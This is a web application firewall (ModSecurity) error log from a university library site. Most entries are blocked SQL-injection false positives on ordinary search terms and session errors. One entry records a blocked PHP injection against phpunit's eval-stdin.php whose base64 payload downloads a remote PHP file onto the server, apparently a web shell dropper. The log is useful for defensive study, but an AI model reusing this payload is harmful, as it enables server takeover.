[Mon Aug 28 19:49:19.021623 2023] [:error] [pid 50988] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Agung Winoto L210900009\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyXz8Co-f0AAMcs4D4AAAAW"]
[Mon Aug 28 20:10:03.928841 2023] [:error] [pid 51497] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Charda, Ujang\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOycq8Co-f0AAMkpI-sAAAAD"]
[Mon Aug 28 20:12:37.914830 2023] [:error] [pid 51318] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digilibpasca.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydRcCo-f0AAMh2TGoAAAAE"]
[Tue Aug 29 00:02:24.197606 2023] [:error] [pid 56099] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Sutojo, Wagiati\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzTIMCo-f0AANsjLTEAAAAP"]
[Tue Aug 29 00:14:10.879653 2023] [:error] [pid 56316] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Pemasaran\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzV4sCo-f0AANv8-IkAAAAU"]
[Tue Aug 29 00:25:27.607621 2023] [:error] [pid 56530] [client 85.208.96.206] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nur Muniroh\\x09L250170015\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzYh8Co-f0AANzS71oAAAAG"]
[Tue Aug 29 00:34:20.415457 2023] [:error] [pid 56593] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Studi kelayakan investasi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzanMCo-f0AAN0RpcoAAAAE"]
[Tue Aug 29 00:44:57.623924 2023] [:error] [pid 56817] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Yuni Rukmanto L210140030\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzdGcCo-f0AAN3xEvgAAAAG"]
[Tue Aug 29 00:45:32.995151 2023] [:error] [pid 56649] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Rajagukguk, Erman\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzdPMCo-f0AAN1JLH8AAAAN"]
[Tue Aug 29 00:58:32.881318 2023] [:error] [pid 56918] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Anjar Lugiyana L230150011\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzgSMCo-f0AAN5W5MoAAAAG"]
[Tue Aug 29 01:02:35.696390 2023] [:error] [pid 57024] [client 85.208.96.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Ghina Jennia L210160006\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzhO8Co-f0AAN7AHUIAAAAD"]
[Tue Aug 29 02:00:50.512726 2023] [:error] [pid 57629] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Mia Maela Fatimah L220160024\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZOzu4sCo-f0AAOEd7PoAAAAR"]
[Tue Aug 29 05:34:56.621660 2023] [:error] [pid 59817] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Manajemen\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0hEMCo-f0AAOmpuSAAAAAR"]
[Tue Aug 29 05:44:49.003562 2023] [:error] [pid 59891] [client 85.208.96.196] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Muhamad Agus Fitriadi L250160009\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZO0jYcCo-f0AAOnzZI4AAAAB"]
[Tue Aug 29 08:30:49.437294 2023] [:error] [pid 62359] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Syarif Syefada L230800021\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1KScCo-f0AAPOXWpsAAAAS"]
[Tue Aug 29 12:34:34.823000 2023] [:error] [pid 3640] [client 85.208.96.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Manajemen Usaha Kecil\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2DasCo-f0AAA44ePAAAAAI"]
[Tue Aug 29 16:05:51.201054 2023] [:error] [pid 8345] [client 85.208.96.207] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Ilmu Hukum\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZO2078Co-f0AACCZqzgAAAAD"]
[Tue Aug 29 16:09:10.977880 2023] [:error] [pid 8219] [client 85.208.96.195] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Galumbang Hutapea L210180006\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZO21tsCo-f0AACAbZsEAAAAA"]
[Tue Aug 29 16:17:17.821467 2023] [:error] [pid 8562] [client 85.208.96.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Audit committee effectiveness, Accounting complexi\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibpasca.unla.ac.id"] [uri "/index.php"] [unique_id "ZO23ncCo-f0AACFyipcAAAAW"]
[Mon Aug 28 06:46:28.050573 2023] [:error] [pid 37421] [client 165.154.118.145] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "203.176.176.235"] [uri "/index_sso.php"] [unique_id "ZOvgVMCo-f0AAJIt8FwAAAAW"]
[Mon Aug 28 06:51:03.679892 2023] [:error] [pid 37313] [client 103.119.55.143] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhZ8Co-f0AAJHB33cAAAAD"]
[Mon Aug 28 06:51:03.827751 2023] [:error] [pid 37418] [client 101.128.68.106] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvhZ8Co-f0AAJIqOD8AAAAT"]
[Mon Aug 28 06:51:11.237439 2023] [:error] [pid 37421] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvhb8Co-f0AAJIt8nMAAAAW"]
[Mon Aug 28 06:51:11.252998 2023] [:error] [pid 37420] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvhb8Co-f0AAJIsP08AAAAV"]
[Mon Aug 28 06:51:11.281209 2023] [:error] [pid 37451] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvhb8Co-f0AAJJLphcAAAAA"]
[Mon Aug 28 06:51:11.284791 2023] [:error] [pid 37313] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvhb8Co-f0AAJHB34cAAAAD"]
[Mon Aug 28 06:51:11.493406 2023] [:error] [pid 37451] [client 114.125.228.93] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvhb8Co-f0AAJJLphgAAAAA"]
[Mon Aug 28 06:51:25.428726 2023] [:error] [pid 37312] [client 101.128.69.60] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvhfcCo-f0AAJHAkB0AAAAY"]
[Mon Aug 28 06:51:30.631347 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOvhgsCo-f0AAJHB36IAAAAD"]
[Mon Aug 28 06:51:30.691692 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOvhgsCo-f0AAJIZRoEAAAAF"]
[Mon Aug 28 06:51:30.811930 2023] [:error] [pid 37451] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOvhgsCo-f0AAJJLpjMAAAAA"]
[Mon Aug 28 06:51:30.821102 2023] [:error] [pid 37313] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOvhgsCo-f0AAJHB36QAAAAD"]
[Mon Aug 28 06:51:30.821568 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOvhgsCo-f0AAJIZRoIAAAAF"]
[Mon Aug 28 06:51:30.822796 2023] [:error] [pid 37407] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOvhgsCo-f0AAJIfRJYAAAAN"]
[Mon Aug 28 06:51:30.861021 2023] [:error] [pid 37312] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery-1.4.4.min.js"] [unique_id "ZOvhgsCo-f0AAJHAkCQAAAAY"]
[Mon Aug 28 06:51:30.935519 2023] [:error] [pid 37465] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/scripts.js"] [unique_id "ZOvhgsCo-f0AAJJZZk0AAAAE"]
[Mon Aug 28 06:51:31.007628 2023] [:error] [pid 37401] [client 114.79.55.189] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/js/jquery.ScrollTo.js"] [unique_id "ZOvhg8Co-f0AAJIZRoMAAAAF"]
